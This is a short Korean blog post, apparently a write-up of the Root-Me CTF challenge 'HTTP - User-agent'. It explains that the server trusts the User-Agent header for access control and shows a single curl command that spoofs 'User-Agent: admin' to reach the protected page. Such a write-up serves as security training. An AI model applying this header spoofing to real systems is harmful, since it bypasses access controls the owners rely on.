-
[Header] HTTP - User-agentHacking/CTF 문제 풀이 2025. 7. 7. 23:26728x90반응형
Problem
User-Agent를 조작하여 검증을 우회 하세요.
Working through problems
문제를 살펴보니 서버가 HTTP 요청의 User-Agent 값을 검사하여 이를 기반으로 접근을 제어하는 방식으로 구현되어 있습니다.
그러나 User-Agent는 클라이언트 측에서 쉽게 조작이 가능한 헤더로 이를 신뢰하여 인증 또는 인가를 수행하는 것은 보안상 매우 취약한 설계에 해당합니다.
1. Header 조작 후 테스트
Header에 User-Agent=admin을 추가하여 요청을 보냈습니다.
curl -H "User-Agent: admin" http://challenge01.root-me.org/web-serveur/ch2/결과는 다음과 같았습니다.
<h3> Welcome master!<br/> Password: 비밀번호 </h3>728x90반응형'Hacking > CTF 문제 풀이' 카테고리의 다른 글
[Burp Suite] API - Broken Access (0) 2025.07.07 Weak password (0) 2025.07.07 [Open Redirect] HTTP - Open redirect (0) 2025.07.03 [X-Forwarded-For] HTTP - IP Restriction Bypass (0) 2025.07.03 [A03:2021 - Injection] SQL Injection을 이용한 사용자 계정 정보 탈취 - Error Based SQL Injection (1) 2025.06.18